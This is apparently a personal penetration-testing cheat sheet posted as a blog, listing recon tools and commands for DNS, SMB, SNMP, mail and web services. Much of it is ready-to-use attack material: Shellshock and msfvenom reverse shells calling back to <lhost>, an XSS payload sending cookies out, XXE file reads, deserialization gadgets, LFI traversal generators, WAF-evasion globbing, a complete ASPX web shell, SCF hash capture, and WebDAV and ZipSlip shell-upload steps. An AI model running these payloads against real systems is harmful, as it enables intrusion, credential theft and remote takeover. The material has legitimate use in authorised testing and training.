Posts Miscellaneous Snippets
Post
Cancel

Miscellaneous Snippets

Collection of references, commands, scripts, and tool usage examples for various things.

References

ISO
OWASP cheatsheetseries
OWASP Top 10
PTES
SANS
NIST
COBIT
SABSA
TOGAF
ITIL


OSINT

awesome-osint
theharverster
Shodan
Google Hacking Database
Censys
spiderfoot
gitrob
maltego/casefile
recon-ng
discover.sh


General

Backup Files


bfac

1
bfac --url http://<rhost>/<target-file>

fuzzx

1
python fuzzx.py http://<rhost>/<target-file>


Crypto


CyberChef
dCode
esolangs
RsaCtfTool
DTFM decoder

Curl


1
2
3
4
5
6
7
8
curl -i <rhost>

curl <rhost>/robots.txt -s | html2text
curl <rhost>/README.md -s | html2text

curl <rhost> -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
curl <rhost> -s -L | grep '<!--.*-->' | sed -e 's/^[[:space:]]*//'
curl <rhost> -s -L |sed -n '/<!--/,/-->/p'


DNS


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
dig axfr @<rhost> <domain>  
dig @<rhost> -x <rhost>

dig @<rhost> <domain> mx
dig @<rhost> <domain> ns

dig @<rhost> <domain> ALL
dig axfr <domain> @<rhost>
dig txt _dmarc.<domain>

host -l <domain> <rhost>

nslookup 
> set querytype=any
> <domain>

nslookup -type=txt <domain>

nmap --script dns-srv-enum --script-args dns-srv-enum.domain=<domain>

dnsenum <domain> 
dnsenum -p 5 -s 20 <domain> 
dnsenum -f subdomainslist.txt <domain>
dnsenum --enum <domain>

dnsrecon -d <domain> -t axfr 
dnsrecon -d <domain> -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml   // brute
dnsrecon -t std -d <domain>

dnstracer -r 3 -v example.com 

dmitry -wins output.txt <domain> 


Common Record Types


RecordDescription
AHost address
AAAAIPv6 host address
ALIASAuto resolved alias
CNAMECanonical name for an alias
MXMail eXchange
NSName Server
PTRPointer
SOAStart Of Authority
SRVlocation of service
TXTDescriptive text


DNSSEC Record Types


RecordDescription
DNSKEYDNSSEC public key
DSDelegation Signer
NSECNext Secure
NSEC3Next Secure v. 3
NSEC3PARAMNSEC3 Parameters
RRSIGRRset Signature


Less common Record Types


RecordDescription
AFSDBAFS Data Base location
ATMAAsynchronous Transfer Mode address
CAACertification Authority Authorization
CERTCertificate / CRL
DHCIDDHCP Information
DNAMENon-Terminal DNS Name Redirection
HINFOHost information
ISDNISDN address
LOCLocation information
MB, MG, MINFO, MRmailbox records
NAPTRNaming Authority Pointer
NSAPNSAP address
RPResponsible person
RTRoute through
TLSATransport Layer Security Authentication
X25X.25 PSDN address

For a more detialed explaination of each type of record, shout out to dns-record-types by Simple DNS.


SubDomains


So many quality subdomain enumeration tools now amass
findomain
all.txt

1
wfuzz -w /root/SecLists/Discovery/DNS/subdomains-top1mil-5000.txt -u domain.htb -H "Host:FUZZ.domain.htb"   // HTB 


.DS_Store


ds_store_exp
ds_storescanner

1
python ds_store_exp.py http://<rhost>/.DS_Store


Emails


scrapemail

1
2
python scrapemail.py -url http://<rhost>/
python scrapemail.py -ulist <url-file>


Evil-WinRAR


Evil-WinRAR-Gen

1
2
3
4
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<lhost> LPORT=<lport> -f exe > shell.exe

touch winrar.txt
./evilWinRAR.py -e shell.exe -g winrar.txt


Finger


finger-user-enum.pl

1
2
3
finger <user>@<rhost>

./finger-user-enum.pl -U <username-list> -t <rhost>


Gobuster Wordlists


1
2
3
4
5
6
7
8
9
/usr/share/wordlists/dirb/common.txt
/usr/share/wordlists/dirb/big.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 
/root/SecLists/Discovery/Web-Content/common.txt 
/root/SecLists/Discovery/Web-Content/RobotsDisallowed-Top1000.txt
/root/SecLists/Discovery/Web-Content/CGIs.txt
/root/SecLists/Discovery/Web-Content/Logins.fuzz.txt
/root/SecLists/Discovery/Web-Content/raft*


HTTP Request Methods


MethodDescription
GETThe GET method requests a representation of the specified resource. Requests using GET should only retrieve data.
HEADThe HEAD method asks for a response identical to that of a GET request, but without the response body.
POSTThe POST method is used to submit an entity to the specified resource, often causing a change in state or side effects on the server.
PUTThe PUT method replaces all current representations of the target resource with the request payload.
DELETEThe DELETE method deletes the specified resource.
CONNECTThe CONNECT method establishes a tunnel to the server identified by the target resource.
OPTIONSThe OPTIONS method is used to describe the communication options for the target resource.
TRACEThe TRACE method performs a message loop-back test along the path to the target resource.
PATCHThe PATCH method is used to apply partial modifications to a resource.


HTTPS / SSL


testssl.sh

1
2
3
4
5
6
7
8
nmap -sV -Pn -vv -p 443 --script=ssl-ccs-injection,ssl-cert-intaddr,ssl-cert,ssl-date,ssl-dh-params,ssl-enum-ciphers,ssl-heartbleed,ssl-known-key,ssl-poodle,sslv2-drown,sslv2 <rhost>

sslyze --regular <rhost>

./testssl.sh <rhost>
./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U <rhost>

python heartbleed.py <rhost>   


IIS Shortname


IIS_shortname_Scanner

1
python iis_shortname_Scan.py http://<rhost>/dir/


Java Deserialization


ysoserial

1
java -jar ysoserial.jar <payload> <command>


JSON Attacks


Attacking JSON Application - websecgeeks
JSON Deserialization Attacks
Munoz-Friday-The-13th-Json-Attacks
Munoz-Friday-The-13th-Json-Attacks 2


Json.Net Deserialization


ysoserial.net

1
ysoserial.exe -f <formatter> -g <gadget> -o <output> -c <command>
1
2
3
4
5
6
7
8
9
10
11
ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "certutil.exe -urlcache..."

{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd','/c certutil.exe -urlcache...']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}


JSON Web Tokens


JWT.IO allows you to decode, verify and generate JWT.

JWT.io


LFI


sensitve-files

1
python lfigen.py /etc/passwd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
import sys

f = sys.argv[1]

print "%s" % f 
print "..%s" % f
print "../..%s" % f
print "../../..%s" % f
print "../../../..%s" % f
print "../../../../..%s" % f
print "../../../../../..%s" % f
print "../../../../../../..%s" % f
print "../../../../../../../..%s" % f
print "../../../../../../../../..%s" % f
print "%s%%00" % f
print "..%s%%00" % f
print "../..%s%%00" % f
print "../../..%s%%00" % f
print "../../../..%s%%00" % f
print "../../../../..%s%%00" % f 
print "../../../../../..%s%%00" % f 
print "../../../../../../..%s%%00" % f 
print "../../../../../../../..%s%%00" % f 
print "../../../../../../../../..%s%%00" % f 
print "%s?" % f
print "..%s?" % f
print "../..%s?" % f
print "../../..%s?" % f
print "../../../..%s?" % f
print "../../../../..%s?" % f
print "../../../../../..%s?" % f
print "../../../../../../..%s?" % f
print "../../../../../../../..%s?" % f
print "../../../../../../../../..%s?" % f
print "..../%s" % f
print "....//..../%s" % f
print "....//....//..../%s" % f
print "....//....//....//..../%s" % f
print "....//....//....//....//..../%s" % f
print "....//....//....//....//....//..../%s" % f
print "....//....//....//....//....//....//..../%s" % f
print "....//....//....//....//....//....//....//..../%s" % f
print "....//....//....//....//....//....//....//....//..../%s" % f
print "....//....//....//....//....//....//....//....//....//..../%s" % f
print "/%%5C..%s" % f
print "/%%5C../%%5C..%s" % f
print "/%%5C../%%5C../%%5C..%s" % f
print "/%%5C../%%5C../%%5C../%%5C..%s" % f
print "/%%5C../%%5C../%%5C../%%5C../%%5C..%s" % f
print "/%%5C../%%5C../%%5C../%%5C../%%5C../%%5C..%s" % f
print "/%%5C../%%5C../%%5C../%%5C../%%5C../%%5C../%%5C..%s" % f
print "/%%5C../%%5C../%%5C../%%5C../%%5C../%%5C../%%5C../%%5C..%s" % f
print "/%%5C../%%5C../%%5C../%%5C../%%5C../%%5C../%%5C../%%5C../%%5C..%s" % f
print "/%%5C../%%5C../%%5C../%%5C../%%5C../%%5C../%%5C../%%5C../%%5C../%%5C..%s" % f
print "%%2e%%2e%s" % f
print "%%2e%%2e/%%2e%%2e%s" % f
print "%%2e%%2e/%%2e%%2e/%%2e%%2e%s" % f
print "%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e%s" % 
print "%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e%s" % f
print "%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e%s" % f
print "%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e%s" % f
print "%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e%s" % f
print "%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e%s" % f
print "%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e/%%2e%%2e%s" % f


Magic Bytes


Magic Bytes - List of file signatures

Executable BinariesMnemonicSignature
DOS Executable“MZ”4D 5A
ELF Executable“.ELF”7F 45 4C 46


Image File FormatsMnemonicSignature
PNG Image“.PNG….”89 50 4E 47 0D 0A 1A 0A
GIF Image“GIF87a”
“GIF89a
47 49 46 38 37 61
47 49 46 38 39 61
JPEG Image“ÿØÿÛ”
“ÿØÿà..JFIF..”
“ÿØÿî”
“ÿØÿá..Exif..”
FF D8 FF DB
FF D8 FF E0 00 10 4A 46 49 46 00 01
FF D8 FF EE
FF D8 FF E1 ?? ?? 45 78 69 66 00 00


Mail


1
2
smtp-user-enum -M VRFY -U <userlist> -t <rhost>
smtp-user-enum -M EXPN -U <userlist> -t <rhost>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#!/usr/bin/python 
import socket 
import sys 

if len(sys.argv) != 2:         
    print "usage: vrfy.py <username>"         
    sys.exit(0)

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
connect=s.connect(('<rhost>',25)) 
banner=s.recv(1024) print banner 
s.send('VRFY ' + sys.argv[1] + '\r\n') 
result=s.recv(1024) 
print result 
s.close() 


POP3

CommandComment
USERYour user name for this mail server
PASSYour password.
QUITEnd your session.
STATNumber and total size of all messages
LISTMessage# and size of message
RETR message#Retrieve selected message
DELE message#Delete selected message
NOOPNo-op. Keeps you connection open.
RSETReset the mailbox. Undelete deleted messages.


SMTP

CommandComment
HELOIt’s the first SMTP command: is starts the conversation identifying the sender server and is generally followed by its domain name.
EHLOAn alternative command to start the conversation, underlying that the server is using the Extended SMTP protocol.
MAIL FROMWith this SMTP command the operations begin: the sender states the source email address in the “From” field and actually starts the email transfer.
RCPT TOIt identifies the recipient of the email; if there are more than one, the command is simply repeated address by address.
SIZEThis SMTP command informs the remote server about the estimated size (in terms of bytes) of the attached email. It can also be used to report the maximum size of a message to be accepted by the server.
DATAWith the DATA command the email content begins to be transferred; it’s generally followed by a 354 reply code given by the server, giving the permission to start the actual transmission.
VRFYThe server is asked to verify whether a particular email address or username actually exists.
TURNThis command is used to invert roles between the client and the server, without the need to run a new connaction.
AUTHWith the AUTH command, the client authenticates itself to the server, giving its username and password. It’s another layer of security to guarantee a proper transmission.
RSETIt communicates the server that the ongoing email transmission is going to be terminated, though the SMTP conversation won’t be closed (like in the case of QUIT).
EXPNThis SMTP command asks for a confirmation about the identification of a mailing list.
HELPIt’s a client’s request for some information that can be useful for the a successful transfer of the email.
QUITIt terminates the SMTP conversation.
MAILDefines source email address
BDATSignifies that binary data will follow


Networking


Windows

1
2
3
4
5
6
7
8
9
10
11
12
13
14
1) Windows + R

2) ncpa.cpl    // run

3) Right click Ethernet -> Properties 

4) Select Internet Protocol Version 4 (TCP/IPv4) -> Properties 

5) Enter IP and DNS server:

	Use the following IP address: <...>


	Use the follwing DNS server addresses: <...>

Linux

1
2
3
4
5
6
7
ipcalc xx.xx.xx.xx

ifconfig <iface> xx.xx.xx.xx
ifconfig <iface> xx.xx.xx.xx/24   
ifconfig <iface> xx.xx.xx.xx netmask 255.xx.xx.xx 

echo nameserver xx.xx.xx.xx > /etc/resolv.conf


NFS


1
2
3
4
5
6
showmount -e <rhost>

mkdir /tmp/mnt
mount <rhost>:/<rdir> /tmp/mnt

mount -t nfs <rhost>:/<rdir> /tmp/mnt -nolock


Nmap


1
2
3
4
nmap -sT -p- --min-rate 5000 --max-retries 2 <rhost>
nmap -sC -sV -T4 <rhost>

ports=$(nmap -p- --min-rate=1000  -T4 <rhost> | grep ^[0-9] | cut -d '/'​ -f 1 | tr ​'\n'​ ​','​ | sed s/,$//) nmap -p​$ports​ -sC -sV <rhost> 


Oracle


odat.py

1
2
3
4
5
6
7
8
oscanner -s <rhost> -P <rport>

./odat.py sidguesser -s <rhost>

use auxiliary/admin/oracle/sid_brute  
use auxiliary/admin/oracle/sid_enum  

tnscmd10g version -h <rhost>


Padbusting


PadBuster

1
2
padbuster http://<rhost>/login.php <cookievalue> 8 --cookies <param>=<cookievalue> --encoding 0
padbuster http://<rhost>/login.php <cookievalue> 8 --cookies <param>=<cookievalue> --encoding 0 -plaintext  '<p>=<v>' 


RDP


pth-remote-desktop

1
2
3
4
5
apt-get update
apt-get install freerdp-x11

xfreerdp /u:<username> /pth:<hash> /v:<rhost>
xfreerdp -u <username> -p <password> <rhost>


reGeorg


reGeorg

1
2
3
4
5
6
1) Upload tunnel.(aspx|ashx|jsp|php) to a webserver 

2) Configure you tools to use a socks proxy, use the ip address and port you specified when you started the reGeorgSocksProxy.py 

python reGeorgSocksProxy.py -p <port> -u http:/<rhost>/<uploaded-tunnel>
proxychains <command>


RPC


1
2
3
rpcclient <rhost> -U "" -N
rpcinfo -p <rhost>
rpcdump <rhost>  -v


Rsync


rsync-man-pages
pentesting-rsync

1
2
3
4
5
6
7
8
rsync --list-only -a rsync://<rhost>:<port> 
rsynx -avz rsync://<rhost>:<port>/etc /root/download/etc

/etc/rsync.conf 

for word in $(cat /root/SecLists/Passwords/Leaked-Databases/rockyou-10.txt ); do sshpass -p $word rsync -6 -r rsync://<user>@<rhost>:<port>/module/ .; done 

rsync -av rsync://<user>@<rhost>/<module> <module> --port <port> –password-file=/root/rockyou.txt


Shellshock


shocker

1
2
3
4
5
python shocker.py -H <rhost> --command "/bin/cat /etc/passwd" -c /cgi-bin/shellshock.sh --verbose 
python shocker.py -H <rhost> --command "/bin/bash -i > /dev/tcp/<lhost>/<lport> 0<&1 2>&1" -c /cgi-bin/shellshock.sh 

User-Agent: () { :; }; bash -i >& /dev/tcp/<lhost>/<lport> 0>&1
User-Agent: () { :; }; /usr/bin/nc <lhost> <lport> -e /bin/sh


SMB


Impacket
stealing hashes
capture ntlm hashes
smb-share-scf-file-attacks

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
enum4linux -a <rhost>

nbtscan <rhost>
nmblookup -A <rhost>
nbtstat -a <rhost>

samrdump.py <rhost>

smbmap -H <rhost> -u anonymous
nullinux -all <rhost>

smbclient //<rhost>/<share> -U " "%" "


auxiliary/admin/smb/samba_symlink_traversal
smb> symlink / rootfs
smb> cd rootfs
smb> symlink ../../../../../../../../../../foobar
smb> cd foobar  


responder -I <interface>

// save and upload as @hash.scf
[Shell]
Command=2
IconFile=\\<lhost>\share\hash.ico
[Taskbar]
Command=ToggleDesktop


SNMP


snmpenum.pl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
nmap -sV -Pn -vv -p 161 --script=snmp-info,snmp-win32-users,snmp-processes,snmp-win32-services,snmp-win32-software,snmp-win32-shares <rhost> 

auxiliary/scanner/snmp/snmp_enumusers

snmpwalk -c <community> -v1 <rhost> 1
snmpcheck -t <rhost> -c <community>
snmpenum -t <rhost>
onesixtyone -c <community> -i <rhost>

./snmpenum.pl <rhost> public linux.txt
./snmpenum.pl <rhost> public windows.txt

Enumerate MIB:
****************************************
1.3.6.1.2.1.25.1.6.0    System Processes
1.3.6.1.2.1.25.4.2.1.2  Running Programs
1.3.6.1.2.1.25.4.2.1.4  Processes Path
1.3.6.1.2.1.25.2.3.1.4  Storage Units
1.3.6.1.2.1.25.6.3.1.2  Software Name
1.3.6.1.4.1.77.1.2.25   User Accounts
1.3.6.1.2.1.6.13.1.3    TCP Local Ports
****************************************

snmpwalk -c <community> -v1 <rhost> <MIB>


Stego


stego-toolkit
StegCracker

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
strings <file>

binwalk <file>
binwalk -e <file>

exiftool <file>
exiv2 <file>

foremost -i <file>

steghide info <file>
steghide extract -sf <file>

pngcheck <file>

zsteg -a <file>
zsteg -E <file>


WAF - Globbing


WAF evasion 1
WAF evasion 2
WAF evasion 3

1
2
3
4
5
6
7
Standard: 		/bin/nc myip 1337 
Evasion:			/???/n? 2130706433 1337 
Used chars: 		/ ? n [0-9]

Standard: 		/bin/cat /etc/passwd
Evasion: 			/???/??t /???/??ss??
Used chars: 		/ ? t s


Web Dav


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
davtest -url http://<rhost>/
davtest -url http://<rhost>/<dir>


1)
--------------------------------------------------------------------------------------------
msfvenom -p php/meterpreter/reverse_tcp lhost=<lhost> lport=<lport> -f raw > shell.php

curl http://<rhost>/dav/ --upload-file /root/shell.php

./handler.sh windows/meterpreter/reverse_tcp <lhost> <lport>
curl http://<rhost>/dav/shell.php


2)
--------------------------------------------------------------------------------------------
msfvenom -p php/meterpreter/reverse_tcp lhost=<lhost> lport=<lport> -f raw > shell.php

cadaver http://<rhost>/dav 
dav:/>put shell.php
dav:/>exit

./handler.sh windows/meterpreter/reverse_tcp <lhost> <lport>
curl http://<rhost>/dav/shell.php


3)
--------------------------------------------------------------------------------------------
msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt

cadaver http://<rhost>/dav
dav:/>put /root/aspshell.txt
dav:/>copy aspshell.txt aspshellnew.asp;.txt
dav:/>exit

./handler.sh windows/meterpreter/reverse_tcp <lhost> <lport>
curl http://<rhost>/dav/asphellnew.asp;.txt  


Webmin


ExploitDB-2017

1
2
3
4
perl webmin.pl <rhost> 10000 <target-file>
auxiliary/admin/webmin/file_disclosure

curl http://<rhost>:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd 


Web Shells


WhiteWinterWolf
phpbash
p0wny-shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
root@kali:/usr/share/webshells# tree
.
├── asp
│   ├── cmd-asp-5.1.asp
│   └── cmdasp.asp
├── aspx
│   └── cmdasp.aspx
├── cfm
│   └── cfexec.cfm
├── jsp
│   ├── cmdjsp.jsp
│   └── jsp-reverse.jsp
├── perl
│   ├── perlcmd.cgi
│   └── perl-reverse-shell.pl
└── php
    ├── findsock.c
    ├── php-backdoor.php
    ├── php-findsock-shell.php
    ├── php-reverse-shell.php
    ├── qsd-php-backdoor.php
    └── simple-backdoor.php

ASPX

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

Function getCommandOutput(theCommand)

    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll

end Function

%>


<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>
1
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

Weevely

1
2
3
4
5
weevely generate Sh3ll            // generate password 'Sh3ll' protected PHP backdoor
weevely http://<rhost>/path/to/upload/shell.php Sh3ll  // trigger shell
...
weevely> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


Wordlists / Creation


SecLists
Leaked-Databases
rockyou.txt

1
2
3
4
5
6
7
8
9
10
cewl <url> -w outfilewordlist.txt
cewl <url> -m 6 -w outfileworlist.txt

python cupp.py -pw profiler   

twofi -m 6 -u @target > wordlist_target.txt  

Wordhound 
Brutescrape  
crunch


XXE


XXE Injection

1
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>
1
2
3
4
5
6
7
8
<?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
    <Content>    
	<Author>&xxe;</Author>
	<Subject>exploit</Subject>
     </Content>
1
2
3
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE hack [<!ENTITY xxe SYSTEM "http://<lhost>/shell.php" >]>
<foo>&xxe;</foo>


XXS


Advanced XXS

1
2
3
4
5
<script>alert("XSS")</script>

<iframe SRC="http://<lhost>/report" height = "0" width ="0"></iframe>

<script> new Image().src="http://<lhost>/bogus.php?output="+document.cookie; </script>


ZipSlip


ZipSlip
evilarc

1
2
3
4
5
6
7
8
msfvenom -p php/meterpreter/reverse_tcp LHOST=<lhost> LPORT=<lport> > shell.php

python evilarc.py -f shell.zip -o unix -p "../../../../../../var/www/html" shell.php

./handler.sh php/meterpreter/reverse_tcp <lhost> <lport>

→ Upload shell.zip
→ Trigger meterpreter shell by browsing to it
This post is licensed under CC BY 4.0 by the author.